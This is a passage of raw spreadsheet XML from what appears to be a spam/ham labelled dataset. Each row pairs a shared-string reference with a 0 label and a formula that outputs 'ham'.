    <row r="3532" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3532" t="s">
        <v>2918</v>
      </c>
      <c r="B3532">
        <v>0</v>
      </c>
      <c r="C3532" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3533" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3533" t="s">
        <v>2919</v>
      </c>
      <c r="B3533">
        <v>0</v>
      </c>
      <c r="C3533" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3534" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3534" t="s">
        <v>2920</v>
      </c>
      <c r="B3534">
        <v>0</v>
      </c>
      <c r="C3534" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3535" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3535" t="s">
        <v>2921</v>
      </c>
      <c r="B3535">
        <v>0</v>
      </c>
      <c r="C3535" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3536" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3536" t="s">
        <v>2922</v>
      </c>
      <c r="B3536">
        <v>0</v>
      </c>
      <c r="C3536" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3537" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3537" t="s">
        <v>2923</v>
      </c>
      <c r="B3537">
        <v>0</v>
      </c>
      <c r="C3537" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3538" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3538" t="s">
        <v>2924</v>
      </c>
      <c r="B3538">
        <v>0</v>
      </c>
      <c r="C3538" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3539" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3539" t="s">
        <v>2925</v>
      </c>
      <c r="B3539">
        <v>0</v>
      </c>
      <c r="C3539" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3540" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3540" t="s">
        <v>2926</v>
      </c>
      <c r="B3540">
        <v>0</v>
      </c>
      <c r="C3540" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3541" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3541" t="s">
        <v>2927</v>
      </c>
      <c r="B3541">
        <v>0</v>
      </c>
      <c r="C3541" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3542" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3542" t="s">
        <v>2928</v>
      </c>
      <c r="B3542">
        <v>0</v>
      </c>
      <c r="C3542" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3543" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3543" t="s">
        <v>2929</v>
      </c>
      <c r="B3543">
        <v>0</v>
      </c>
      <c r="C3543" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3544" t="s">
        <v>2930</v>
      </c>
      <c r="B3544">
        <v>0</v>
      </c>
      <c r="C3544" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3545" t="s">
        <v>2931</v>
      </c>
      <c r="B3545">
        <v>0</v>
      </c>
      <c r="C3545" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3546" t="s">
        <v>2932</v>
      </c>
      <c r="B3546">
        <v>0</v>
      </c>
      <c r="C3546" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3547" t="s">
        <v>2933</v>
      </c>
      <c r="B3547">
        <v>0</v>
      </c>
      <c r="C3547" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3548" t="s">
        <v>2934</v>
      </c>
      <c r="B3548">
        <v>0</v>
      </c>
      <c r="C3548" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3549" t="s">
        <v>2935</v>
      </c>
      <c r="B3549">
        <v>0</v>
      </c>
      <c r="C3549" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3550" t="s">
        <v>2936</v>
      </c>
      <c r="B3550">
        <v>0</v>
      </c>
      <c r="C3550" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3551" t="s">
        <v>2937</v>
      </c>
      <c r="B3551">
        <v>0</v>
      </c>
      <c r="C3551" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3552" t="s">
        <v>2938</v>
      </c>
      <c r="B3552">
        <v>0</v>
      </c>
      <c r="C3552" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3553" t="s">
        <v>2939</v>
      </c>
      <c r="B3553">
        <v>0</v>
      </c>
      <c r="C3553" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3554" t="s">
        <v>2940</v>
      </c>
      <c r="B3554">
        <v>0</v>
      </c>
      <c r="C3554" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3555" t="s">
        <v>2941</v>
      </c>
      <c r="B3555">
        <v>0</v>
      </c>
      <c r="C3555" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3556" t="s">
        <v>2942</v>
      </c>
      <c r="B3556">
        <v>0</v>
      </c>
      <c r="C3556" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3557" t="s">
        <v>2943</v>
      </c>
      <c r="B3557">
        <v>0</v>
      </c>
      <c r="C3557" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3558" t="s">
        <v>2944</v>
      </c>
      <c r="B3558">
        <v>0</v>
      </c>
      <c r="C3558" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3559" t="s">
        <v>2945</v>
      </c>
      <c r="B3559">
        <v>0</v>
      </c>
      <c r="C3559" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3560" t="s">
        <v>2946</v>
      </c>
      <c r="B3560">
        <v>0</v>
      </c>
      <c r="C3560" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3561" t="s">
        <v>2947</v>
      </c>
      <c r="B3561">
        <v>0</v>
      </c>
      <c r="C3561" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3562" t="s">
        <v>2948</v>
      </c>
      <c r="B3562">
        <v>0</v>
      </c>
      <c r="C3562" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3563" t="s">
        <v>2949</v>
      </c>
      <c r="B3563">
        <v>0</v>
      </c>
      <c r="C3563" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3564" t="s">
        <v>2950</v>
      </c>
      <c r="B3564">
        <v>0</v>
      </c>
      <c r="C3564" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3565" t="s">
        <v>2951</v>
      </c>
      <c r="B3565">
        <v>0</v>
      </c>
      <c r="C3565" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3566" t="s">
        <v>2952</v>
      </c>
      <c r="B3566">
        <v>0</v>
      </c>
      <c r="C3566" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3567" t="s">
        <v>2953</v>
      </c>
      <c r="B3567">
        <v>0</v>
      </c>
      <c r="C3567" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3568" t="s">
        <v>2954</v>
      </c>
      <c r="B3568">
        <v>0</v>
      </c>
      <c r="C3568" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3569" t="s">
        <v>2955</v>
      </c>
      <c r="B3569">
        <v>0</v>
      </c>
      <c r="C3569" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3570" t="s">
        <v>2956</v>
      </c>
      <c r="B3570">
        <v>0</v>
      </c>
      <c r="C3570" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3571" t="s">
        <v>2957</v>
      </c>
      <c r="B3571">
        <v>0</v>
      </c>
      <c r="C3571" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3572" t="s">
        <v>2958</v>
      </c>
      <c r="B3572">
        <v>0</v>
      </c>
      <c r="C3572" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3573" t="s">
        <v>2959</v>
      </c>
      <c r="B3573">
        <v>0</v>
      </c>
      <c r="C3573" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3574" t="s">
        <v>2960</v>
      </c>
      <c r="B3574">
        <v>0</v>
      </c>
      <c r="C3574" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3575" t="s">
        <v>2961</v>
      </c>
      <c r="B3575">
        <v>0</v>
      </c>
      <c r="C3575" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3576" t="s">
        <v>2962</v>
      </c>
      <c r="B3576">
        <v>0</v>
      </c>
      <c r="C3576" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3577" t="s">
        <v>2963</v>
      </c>
      <c r="B3577">
        <v>0</v>
      </c>
      <c r="C3577" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3578" t="s">
        <v>2964</v>
      </c>
      <c r="B3578">
        <v>0</v>
      </c>
      <c r="C3578" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3579" t="s">
        <v>2965</v>
      </c>
      <c r="B3579">
        <v>0</v>
      </c>
      <c r="C3579" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3580" t="s">
        <v>2966</v>
      </c>
      <c r="B3580">
        <v>0</v>
      </c>
      <c r="C3580" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3581" t="s">
        <v>2967</v>
      </c>
      <c r="B3581">
        <v>0</v>
      </c>
      <c r="C3581" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3582" t="s">
        <v>2968</v>
      </c>
      <c r="B3582">
        <v>0</v>
      </c>
      <c r="C3582" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3583" t="s">
        <v>2969</v>
      </c>
      <c r="B3583">
        <v>0</v>
      </c>
      <c r="C3583" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3584" t="s">
        <v>2970</v>
      </c>
      <c r="B3584">
        <v>0</v>
      </c>
      <c r="C3584" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3585" t="s">
        <v>2971</v>
      </c>
      <c r="B3585">
        <v>0</v>
      </c>
      <c r="C3585" t="str">
        <f t="shared" si="55"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3586" t="s">
        <v>2972</v>
      </c>
      <c r="B3586">
        <v>0</v>
      </c>
      <c r="C3586" t="str">
        <f t="shared" ref="C3586:C3649" si="56">IF(B3586="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3587" t="s">
        <v>2973</v>
      </c>
      <c r="B3587">
        <v>0</v>
      </c>
      <c r="C3587" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3588" t="s">
        <v>2974</v>
      </c>
      <c r="B3588">
        <v>0</v>
      </c>
      <c r="C3588" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3589" t="s">
        <v>2975</v>
      </c>
      <c r="B3589">
        <v>0</v>
      </c>
      <c r="C3589" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3590" t="s">
        <v>2976</v>
      </c>
      <c r="B3590">
        <v>0</v>
      </c>
      <c r="C3590" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3591" t="s">
        <v>2977</v>
      </c>
      <c r="B3591">
        <v>0</v>
      </c>
      <c r="C3591" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3592" t="s">
        <v>2978</v>
      </c>
      <c r="B3592">
        <v>0</v>
      </c>
      <c r="C3592" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3593" t="s">
        <v>2979</v>
      </c>
      <c r="B3593">
        <v>0</v>
      </c>
      <c r="C3593" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3594" t="s">
        <v>2980</v>
      </c>
      <c r="B3594">
        <v>0</v>
      </c>
      <c r="C3594" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3595" t="s">
        <v>2981</v>
      </c>
      <c r="B3595">
        <v>0</v>
      </c>
      <c r="C3595" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3596" t="s">
        <v>2982</v>
      </c>
      <c r="B3596">
        <v>0</v>
      </c>
      <c r="C3596" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3597" t="s">
        <v>2983</v>
      </c>
      <c r="B3597">
        <v>0</v>
      </c>
      <c r="C3597" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3598" t="s">
        <v>2984</v>
      </c>
      <c r="B3598">
        <v>0</v>
      </c>
      <c r="C3598" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3599" t="s">
        <v>2985</v>
      </c>
      <c r="B3599">
        <v>0</v>
      </c>
      <c r="C3599" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3600" t="s">
        <v>2986</v>
      </c>
      <c r="B3600">
        <v>0</v>
      </c>
      <c r="C3600" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3601" t="s">
        <v>2987</v>
      </c>
      <c r="B3601">
        <v>0</v>
      </c>
      <c r="C3601" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3602" t="s">
        <v>2988</v>
      </c>
      <c r="B3602">
        <v>0</v>
      </c>
      <c r="C3602" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3603" t="s">
        <v>2989</v>
      </c>
      <c r="B3603">
        <v>0</v>
      </c>
      <c r="C3603" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3604" t="s">
        <v>2990</v>
      </c>
      <c r="B3604">
        <v>0</v>
      </c>
      <c r="C3604" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3605" t="s">
        <v>2991</v>
      </c>
      <c r="B3605">
        <v>0</v>
      </c>
      <c r="C3605" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3606" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3606" t="s">
        <v>2992</v>
      </c>
      <c r="B3606">
        <v>0</v>
      </c>
      <c r="C3606" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3607" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3607" t="s">
        <v>2993</v>
      </c>
      <c r="B3607">
        <v>0</v>
      </c>
      <c r="C3607" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3608" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3608" t="s">
        <v>2994</v>
      </c>
      <c r="B3608">
        <v>0</v>
      </c>
      <c r="C3608" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3609" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3609" t="s">
        <v>2995</v>
      </c>
      <c r="B3609">
        <v>0</v>
      </c>
      <c r="C3609" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3610" t="s">
        <v>2996</v>
      </c>
      <c r="B3610">
        <v>0</v>
      </c>
      <c r="C3610" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3611" t="s">
        <v>2997</v>
      </c>
      <c r="B3611">
        <v>0</v>
      </c>
      <c r="C3611" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3612" t="s">
        <v>2998</v>
      </c>
      <c r="B3612">
        <v>0</v>
      </c>
      <c r="C3612" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3613" t="s">
        <v>2999</v>
      </c>
      <c r="B3613">
        <v>0</v>
      </c>
      <c r="C3613" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3614" t="s">
        <v>3000</v>
      </c>
      <c r="B3614">
        <v>0</v>
      </c>
      <c r="C3614" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3615" t="s">
        <v>3001</v>
      </c>
      <c r="B3615">
        <v>0</v>
      </c>
      <c r="C3615" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3616" t="s">
        <v>3002</v>
      </c>
      <c r="B3616">
        <v>0</v>
      </c>
      <c r="C3616" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3617" t="s">
        <v>3003</v>
      </c>
      <c r="B3617">
        <v>0</v>
      </c>
      <c r="C3617" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3618" t="s">
        <v>3004</v>
      </c>
      <c r="B3618">
        <v>0</v>
      </c>
      <c r="C3618" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3619" t="s">
        <v>3005</v>
      </c>
      <c r="B3619">
        <v>0</v>
      </c>
      <c r="C3619" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3620" t="s">
        <v>3006</v>
      </c>
      <c r="B3620">
        <v>0</v>
      </c>
      <c r="C3620" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3621" t="s">
        <v>3007</v>
      </c>
      <c r="B3621">
        <v>0</v>
      </c>
      <c r="C3621" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3622" t="s">
        <v>3008</v>
      </c>
      <c r="B3622">
        <v>0</v>
      </c>
      <c r="C3622" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3623" t="s">
        <v>3009</v>
      </c>
      <c r="B3623">
        <v>0</v>
      </c>
      <c r="C3623" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3624" t="s">
        <v>3010</v>
      </c>
      <c r="B3624">
        <v>0</v>
      </c>
      <c r="C3624" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3625" t="s">
        <v>3011</v>
      </c>
      <c r="B3625">
        <v>0</v>
      </c>
      <c r="C3625" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3626" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3626" t="s">
        <v>3012</v>
      </c>
      <c r="B3626">
        <v>0</v>
      </c>
      <c r="C3626" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3627" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3627" t="s">
        <v>3013</v>
      </c>
      <c r="B3627">
        <v>0</v>
      </c>
      <c r="C3627" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3628" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3628" t="s">
        <v>3014</v>
      </c>
      <c r="B3628">
        <v>0</v>
      </c>
      <c r="C3628" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3629" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3629" t="s">
        <v>3015</v>
      </c>
      <c r="B3629">
        <v>0</v>
      </c>
      <c r="C3629" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3630" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3630" t="s">
        <v>3016</v>
      </c>
      <c r="B3630">
        <v>0</v>
      </c>
      <c r="C3630" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3631" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3631" t="s">
        <v>3017</v>
      </c>
      <c r="B3631">
        <v>0</v>
      </c>
      <c r="C3631" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3632" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3632" t="s">
        <v>3018</v>
      </c>
      <c r="B3632">
        <v>0</v>
      </c>
      <c r="C3632" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3633" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3633" t="s">
        <v>3019</v>
      </c>
      <c r="B3633">
        <v>0</v>
      </c>
      <c r="C3633" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3634" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3634" t="s">
        <v>3020</v>
      </c>
      <c r="B3634">
        <v>0</v>
      </c>
      <c r="C3634" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3635" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3635" t="s">
        <v>3021</v>
      </c>
      <c r="B3635">
        <v>0</v>
      </c>
      <c r="C3635" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3636" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3636" t="s">
        <v>3022</v>
      </c>
      <c r="B3636">
        <v>0</v>
      </c>
      <c r="C3636" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3637" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3637" t="s">
        <v>3023</v>
      </c>
      <c r="B3637">
        <v>0</v>
      </c>
      <c r="C3637" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3638" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3638" t="s">
        <v>3024</v>
      </c>
      <c r="B3638">
        <v>0</v>
      </c>
      <c r="C3638" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3639" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3639" t="s">
        <v>3025</v>
      </c>
      <c r="B3639">
        <v>0</v>
      </c>
      <c r="C3639" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3640" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3640" t="s">
        <v>3026</v>
      </c>
      <c r="B3640">
        <v>0</v>
      </c>
      <c r="C3640" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3641" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3641" t="s">
        <v>3027</v>
      </c>
      <c r="B3641">
        <v>0</v>
      </c>
      <c r="C3641" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3642" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3642" t="s">
        <v>3028</v>
      </c>
      <c r="B3642">
        <v>0</v>
      </c>
      <c r="C3642" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3643" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3643" t="s">
        <v>3029</v>
      </c>
      <c r="B3643">
        <v>0</v>
      </c>
      <c r="C3643" t="str">
        <f t="shared" si="56"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3644" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3644" t="s">
        <v>3030</v>
      </c>
      <c r="B3644">
